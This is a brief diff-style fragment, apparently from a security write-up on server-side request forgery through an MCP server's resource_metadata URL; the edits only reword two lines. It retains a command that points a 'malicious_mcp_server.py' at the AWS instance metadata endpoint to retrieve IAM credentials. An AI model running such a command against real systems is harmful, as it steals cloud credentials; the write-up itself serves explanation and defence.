Skip to main content

 #

-In a real attack, the resource_metadata URL would point at something the attacker actually wants to reach:
+In practice, the resource_metadata URL would point at high-value internal targets:

-# AWS credentials on EC2 (IMDSv1 — no token required)
+# AWS credentials (IMDSv1 — no token required)

 python malicious_mcp_server.py -t "http://169.254.169.254/latest/meta-data/iam/security-credentials/"